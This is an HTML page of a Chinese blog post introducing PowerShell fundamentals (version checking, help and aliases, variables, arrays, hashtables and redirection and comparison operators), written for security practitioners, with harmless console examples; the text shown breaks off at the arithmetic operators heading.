<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="前言我们知道powershell的后缀是ps1，哪为什么是ps1而不是ps2,ps3呢？那么理解这个问题呢我们可以看看powershell的特性，powershell是对下完全兼容的，也就是说你使用powershell 5.x的版本来执行powershell v1.0的代码也是完全没有问题的。那么我个人理解一下为什么是ps1，可以这么说，当我们见到ps2后缀之时就是powershell进行大的更新">
<meta property="og:type" content="article">
<meta property="og:title" content="powershell了解">
<meta property="og:url" content="http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/index.html">
<meta property="og:site_name" content="商见曜">
<meta property="og:description" content="前言我们知道powershell的后缀是ps1，哪为什么是ps1而不是ps2,ps3呢？那么理解这个问题呢我们可以看看powershell的特性，powershell是对下完全兼容的，也就是说你使用powershell 5.x的版本来执行powershell v1.0的代码也是完全没有问题的。那么我个人理解一下为什么是ps1，可以这么说，当我们见到ps2后缀之时就是powershell进行大的更新">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/powershell.png">
<meta property="og:image" content="http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/get-alias.png">
<meta property="og:image" content="http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/get-content.png">
<meta property="og:image" content="http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/get-help.png">
<meta property="article:published_time" content="2022-06-24T06:57:27.000Z">
<meta property="article:modified_time" content="2022-06-28T03:16:24.183Z">
<meta property="article:author" content="kzaopa">
<meta property="article:tag" content="内网">
<meta property="article:tag" content="windows">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/powershell.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>powershell了解</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Archives</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2022/06/30/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%AE%9E%E6%88%98%E6%8C%87%E5%8D%97-1/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2022/06/19/%E4%BA%92%E8%81%94%E7%BD%91%E4%BC%81%E4%B8%9A%E5%AE%89%E5%85%A8%E9%AB%98%E7%BA%A7%E6%8C%87%E5%8D%97/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&text=powershell了解"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&title=powershell了解"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&is_video=false&description=powershell了解"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=powershell了解&body=Check out this article: http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&title=powershell了解"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&title=powershell了解"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&title=powershell了解"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&title=powershell了解"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&name=powershell了解&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://kzaopa.me/2022/06/24/powershell%E4%BA%86%E8%A7%A3/&t=powershell了解"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D"><span class="toc-number">2.</span> <span class="toc-text">介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%98%E9%87%8F"><span class="toc-number">2.1.</span> <span class="toc-text">变量</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%95%B0%E7%BB%84"><span class="toc-number">2.2.</span> <span class="toc-text">数组</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%93%88%E5%B8%8C%E8%A1%A8"><span class="toc-number">2.3.</span> <span class="toc-text">哈希表</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%90%E7%AE%97%E7%AC%A6"><span class="toc-number">2.4.</span> <span class="toc-text">运算符</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8E%A7%E5%88%B6%E8%AF%AD%E5%8F%A5"><span class="toc-number">2.5.</span> <span class="toc-text">控制语句</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%87%BD%E6%95%B0"><span class="toc-number">2.6.</span> <span class="toc-text">函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%89%A7%E8%A1%8C%E7%AD%96%E7%95%A5"><span class="toc-number">2.7.</span> <span class="toc-text">执行策略</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">3.</span> <span class="toc-text">参考</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        powershell了解
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">kzaopa</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-06-24T06:57:27.000Z" itemprop="datePublished">2022 Jun 24</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/powershell/">powershell</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/windows/" rel="tag">windows</a>, <a class="tag-link-link" href="/tags/%E5%86%85%E7%BD%91/" rel="tag">内网</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>我们知道<code>powershell</code>的后缀是<code>ps1</code>，哪为什么是<code>ps1</code>而不是<code>ps2</code>,<code>ps3</code>呢？那么理解这个问题呢我们可以看看<code>powershell</code>的特性，<code>powershell</code>是对下完全兼容的，也就是说你使用<code>powershell 5.x</code>的版本来执行<code>powershell v1.0</code>的代码也是完全没有问题的。那么我个人理解一下为什么是<code>ps1</code>，可以这么说，当我们见到<code>ps2</code>后缀之时就是<code>powershell</code>进行大的更新，也就是不对下兼容的时候，所以这里一直是使用<code>ps1</code>后缀。</p>
<p>那么对于我们的安全人员来说我们用什么版本呢？毫无疑问是<code>v2</code>,为什么呢，因为在<code>win7</code>当中默认安装了<code>v2</code>,而且之后的版本都是兼容<code>v2</code>的，<code>v1</code>版本所有的功能对于我们的需求很多都不能满足，所以<code>v2</code>成为了我们目前来说独一无二的选择，通过下面的方式我们可以看到我们的<code>powershell</code>的版本与一些详细的信息，后面我们的代码，大多都是以<code>v2.0</code>来讨论的。</p>
<pre><code>powershell Get-Host
</code></pre>
<figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Name             : ConsoleHost</span><br><span class="line">Version          : <span class="number">2</span>.<span class="number">0</span></span><br><span class="line">InstanceId       : <span class="number">718</span>bc1d6-db3c-<span class="number">40</span>dd-af4d-c320a7034a8f</span><br><span class="line">UI               : System.Management.Automation.Internal.Host.InternalHostUserInterface</span><br><span class="line">CurrentCulture   : zh-CN</span><br><span class="line">CurrentUICulture : zh-CN</span><br><span class="line">PrivateData      : Microsoft.PowerShell.ConsoleHost+ConsoleColorProxy</span><br><span class="line">IsRunspacePushed : False</span><br><span class="line">Runspace         : System.Management.Automation.Runspaces.LocalRunspace</span><br></pre></td></tr></table></figure>

<h1 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h1><p><code>PowerShell</code>是一种基于任务的命令行解释器和脚本环境，可以说是一种强大的<code>shell</code>,如同<code>linux</code>的<code>bash</code>,专为系统管理员而设计，以<code>.NET</code>框架为平台，<code>Windows PowerShell</code>帮助<code>IT</code>专业人员和超级用户控制和自动化管理<code>Windows</code>操作系统和运行在操作系统上的应用。现被更广泛用于渗透测试等方面，在不需要写入磁盘的情况下执行命令，也可以逃避<code>Anti-Virus</code>检测。</p>
<ul>
<li><p>查看帮助<br><code>cmd</code>命令行界面输入<code>powershell</code>后回车进入<code>powershell</code>命令行，再键入命令<code>get-help</code><br>或<code>cmd</code>命令行直接键入<code>powershell</code> <code>get-help</code><br><img src="/./2022/06/24/powershell%E4%BA%86%E8%A7%A3/powershell.png"></p>
</li>
<li><p>命令别名<br><code>powershell Get-Alias</code>获取当前会话中的所有别名。<br><img src="/./2022/06/24/powershell%E4%BA%86%E8%A7%A3/get-alias.png"><br><code>powershell</code>中有很多<code>dos</code>的命令别名，<code>type</code>、<code>help</code>等<br><img src="/./2022/06/24/powershell%E4%BA%86%E8%A7%A3/get-content.png"><br><img src="/./2022/06/24/powershell%E4%BA%86%E8%A7%A3/get-help.png"></p>
</li>
</ul>
<h2 id="变量"><a href="#变量" class="headerlink" title="变量"></a>变量</h2><p>在<code>Windows PowerShell</code>中，变量的名称以美元符号<code>($)</code>开头，例如<code>$process，$var</code>。 变量的名称不区分大小写，并且包含空格和特殊字符。默认情况下，<code>PowerShell</code>中所有变量的值均为<code>$null</code>。<br><u><strong>注意：</strong>在<code>Windows PowerShell</code>中，特殊字符具有特殊含义。如果在变量名称中使用特殊字符，则需要将它们括在大括号<code>&#123;&#125;</code>中</u></p>
<ul>
<li><p>创建变量、打印变量</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$str</span> =  <span class="string">&#x27;aa&#x27;</span></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$int</span> = <span class="number">233666</span></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$str</span></span><br><span class="line">aa</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$int</span></span><br><span class="line"><span class="number">233666</span></span><br></pre></td></tr></table></figure></li>
<li><p>清空变量、删除变量</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="built_in">set-variable</span> test</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="built_in">get-variable</span> test</span><br><span class="line"></span><br><span class="line">Name                           Value</span><br><span class="line"><span class="literal">----</span>                           <span class="literal">-----</span></span><br><span class="line">test</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="built_in">clear-variable</span> test</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="built_in">remove-variable</span> test</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="built_in">clear-variable</span> test</span><br><span class="line"><span class="built_in">Clear-Variable</span> : 找不到名为“test”的变量。</span><br><span class="line">所在位置 行:<span class="number">1</span> 字符: <span class="number">15</span></span><br><span class="line">+ <span class="built_in">clear-variable</span> &lt;&lt;&lt;&lt;  test</span><br><span class="line">    + CategoryInfo          : ObjectNotFound: (test:String) [<span class="built_in">Clear-Variable</span>], ItemNotFoundException</span><br><span class="line">    + FullyQualifiedErrorId : VariableNotFound,Microsoft.PowerShell.Commands.ClearVariableCommand</span><br></pre></td></tr></table></figure>
</li>
<li><p>变量类型</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$str</span>.gettype()</span><br><span class="line"></span><br><span class="line">IsPublic IsSerial Name                                     BaseType</span><br><span class="line"><span class="literal">--------</span> <span class="literal">--------</span> <span class="literal">----</span>                                     <span class="literal">--------</span></span><br><span class="line">True     True     String                                   System.Object</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$int</span>.gettype()</span><br><span class="line"></span><br><span class="line">IsPublic IsSerial Name                                     BaseType</span><br><span class="line"><span class="literal">--------</span> <span class="literal">--------</span> <span class="literal">----</span>                                     <span class="literal">--------</span></span><br><span class="line">True     True     Int32                                    System.ValueType</span><br><span class="line"></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$qwe</span>.gettype()</span><br><span class="line"></span><br><span class="line">IsPublic IsSerial Name                                     BaseType</span><br><span class="line"><span class="literal">--------</span> <span class="literal">--------</span> <span class="literal">----</span>                                     <span class="literal">--------</span></span><br><span class="line">True     True     Object[]                                 System.Array</span><br><span class="line"></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$test</span> <span class="operator">-is</span> [<span class="built_in">string</span>]</span><br><span class="line">True</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$qwe</span> <span class="operator">-is</span> [<span class="built_in">array</span>]</span><br><span class="line">True</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$aa</span> <span class="operator">-is</span> [<span class="built_in">int</span>]</span><br><span class="line">True</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$aa</span> <span class="operator">-is</span> [<span class="built_in">int</span><span class="type">32</span>]</span><br><span class="line">True</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$aa</span> <span class="operator">-is</span> [<span class="built_in">int</span><span class="type">64</span>]</span><br><span class="line">False</span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="数组"><a href="#数组" class="headerlink" title="数组"></a>数组</h2><ul>
<li><p>数组创建</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">数组的创建可以通过下面五种方式来创建，在适当的条件下选择适当的方式创建即可</span><br><span class="line"></span><br><span class="line"><span class="variable">$array</span> = <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span></span><br><span class="line"><span class="variable">$array</span> = <span class="number">1</span>..<span class="number">4</span>   <span class="comment">#定义一个数组，包含数字1-4</span></span><br><span class="line"><span class="variable">$array</span>=<span class="number">1</span>,<span class="string">&quot;2017&quot;</span>,([<span class="type">System.Guid</span>]::NewGuid()),(<span class="built_in">get-date</span>)</span><br><span class="line"><span class="variable">$a</span>=<span class="selector-tag">@</span>()  <span class="comment"># 空数组</span></span><br><span class="line"><span class="variable">$a</span>=,<span class="string">&quot;1&quot;</span> <span class="comment"># 一个元素的数组</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>数组访问</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$a</span> = <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="string">&#x27;44&#x27;</span>,<span class="string">&#x27;55&#x27;</span>,<span class="string">&#x27;qwe&#x27;</span>,<span class="number">66</span>,<span class="number">77</span></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt;</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$a</span></span><br><span class="line"><span class="number">1</span></span><br><span class="line"><span class="number">2</span></span><br><span class="line"><span class="number">3</span></span><br><span class="line"><span class="number">44</span></span><br><span class="line"><span class="number">55</span></span><br><span class="line">qwe</span><br><span class="line"><span class="number">66</span></span><br><span class="line"><span class="number">77</span></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt;</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$a</span>[<span class="number">3</span>]    <span class="comment">#数组第四个元素</span></span><br><span class="line"><span class="number">44</span></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt;</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$a</span>[<span class="number">2</span><span class="type">..5</span>] <span class="comment">#数组第三到第六个元素</span></span><br><span class="line"><span class="number">3</span></span><br><span class="line"><span class="number">44</span></span><br><span class="line"><span class="number">55</span></span><br><span class="line">qwe</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$a</span>[-<span class="number">3</span><span class="type">..</span>-<span class="number">1</span>]   <span class="comment">#数组最后三个元素</span></span><br><span class="line">qwe</span><br><span class="line"><span class="number">66</span></span><br><span class="line"><span class="number">77</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>数组长度、元素追加、元素删除</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$a</span>.length</span><br><span class="line"><span class="number">9</span></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$a</span> += <span class="string">&#x27;66666666666666&#x27;</span></span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$a</span>.length</span><br><span class="line"><span class="number">10</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$array</span> = <span class="number">1</span>..<span class="number">10</span></span><br><span class="line">[<span class="type">System.Collections.ArrayList</span>]<span class="variable">$arraylist</span> = <span class="variable">$array</span></span><br><span class="line"><span class="variable">$arraylist</span>.RemoveAt(<span class="number">4</span>)</span><br><span class="line"><span class="variable">$null</span> = <span class="variable">$arraylist</span>.Add(<span class="number">11</span>)</span><br><span class="line"><span class="variable">$arraylist</span>.Insert(<span class="number">0</span>,<span class="string">&#x27;新元素&#x27;</span>)</span><br><span class="line"><span class="variable">$arraylist</span></span><br><span class="line"></span><br><span class="line"><span class="number">1</span>、定义了一个数组，包含<span class="number">1</span>到<span class="number">10</span>，一共<span class="number">10</span>个数组元素。</span><br><span class="line"><span class="number">2</span>、将<span class="variable">$array</span>数组变量赋值给<span class="variable">$arraylist</span>变量，这样就将数组变成了ArrayList</span><br><span class="line"><span class="number">3</span>、分别执行RemoveAt()、Add()、Insert()等操作</span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="哈希表"><a href="#哈希表" class="headerlink" title="哈希表"></a>哈希表</h2><p><code>PowerShell</code>哈希表是一种数据结构，用于存储一个或多个键&#x2F;值对。也称为字典或关联数组。在<code>PowerShell</code>中，每个哈希表都有一个哈希表<code>(System.Collections.Hashtable)</code>对象。我们可以在<code>PowerShell</code>中使用<code>Hashtable</code>对象的属性和方法。 哈希表中的键和值也是<code>.NET</code>类型的对象。<br>在引入<code>PowerShell</code>版本<code>3.0</code>之后，我们可以使用<code>[ordered]</code>属性在<code>PowerShell</code>中创建一个有序字典<code>(System.Collections.Specialized.OrderedDictionary)</code>。<br><u><strong>注：</strong>有序字典和哈希表之间的主要区别在于字典中的键始终按照我们列出的顺序显示。但是哈希表中键的顺序不确定。</u></p>
<ul>
<li>哈希表的创建、存数组、<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$stu</span>=<span class="selector-tag">@</span>&#123; Name = <span class="string">&quot;test&quot;</span>;Age=<span class="string">&quot;12&quot;</span>;sex=<span class="string">&quot;man&quot;</span> &#125;</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$stu</span>.keys</span><br><span class="line">Name</span><br><span class="line">Age</span><br><span class="line">sex</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$stu</span>.values</span><br><span class="line">test</span><br><span class="line"><span class="number">12</span></span><br><span class="line"><span class="built_in">man</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$stu1</span>=<span class="selector-tag">@</span>&#123; Name = <span class="string">&quot;hei&quot;</span>;Age=<span class="string">&quot;12&quot;</span>;sex=<span class="string">&quot;man&quot;</span>;Books=<span class="string">&quot;kali&quot;</span>,<span class="string">&quot;sqlmap&quot;</span>,<span class="string">&quot;powershell&quot;</span> &#125;</span><br><span class="line"><span class="built_in">PS</span> C:\Users\Administrator&gt; <span class="variable">$stu1</span>.count</span><br><span class="line"><span class="number">4</span></span><br><span class="line"></span><br><span class="line">哈希表的插入与删除:</span><br><span class="line"><span class="variable">$Student</span>=<span class="selector-tag">@</span>&#123;&#125;</span><br><span class="line"><span class="variable">$Student</span>.Name=<span class="string">&quot;hahaha&quot;</span></span><br><span class="line"><span class="variable">$stu</span>.Remove(<span class="string">&quot;Name&quot;</span>)</span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="运算符"><a href="#运算符" class="headerlink" title="运算符"></a>运算符</h2><ul>
<li><p>常见用法</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">· &gt;:将输出保存到指定文件中（用法：<span class="built_in">Get-Process</span>&gt;output.txt）</span><br><span class="line"></span><br><span class="line">· &gt;&gt;:将脚本的输出追加到指定文件中（用法：test.ps1&gt;&gt;output.txt）</span><br><span class="line"></span><br><span class="line">· <span class="number">2</span>&gt;:将错误输出到指定文件中（<span class="built_in">Get-Porcess</span> none <span class="number">2</span>&gt;Errors.txt）</span><br><span class="line"></span><br><span class="line">· <span class="number">2</span>&gt;&gt;:将错误追加到指定文件中（<span class="built_in">Get-Process</span> none <span class="number">2</span>&gt; logs<span class="literal">-Errors</span>.txt）</span><br><span class="line"></span><br><span class="line">· <span class="operator">-eq</span>:等于运算符（用法：<span class="variable">$var1</span> –eq <span class="variable">$var2</span>，返回真或假）</span><br><span class="line"></span><br><span class="line">· <span class="operator">-gt</span>:大于运算符（用法：<span class="variable">$var1</span> –gt <span class="variable">$var2</span>，返回真或假）</span><br><span class="line"></span><br><span class="line">· <span class="operator">-match</span>:匹配运算符，搜索字符串是否在文中出现（用法：<span class="variable">$Text</span> –match <span class="variable">$string</span>返回真或假）</span><br><span class="line"></span><br><span class="line">· <span class="operator">-replace</span>:替换字符串（用法：<span class="variable">$Text</span> –replace 被替换的字符,替换的字符，返回真或假）</span><br><span class="line"></span><br><span class="line">· <span class="operator">-in</span>：测试一个字符或数字是否出现在文本中或列表中，声明列表直接使用（）</span><br></pre></td></tr></table></figure>
</li>
<li><p>算数运算符</p>
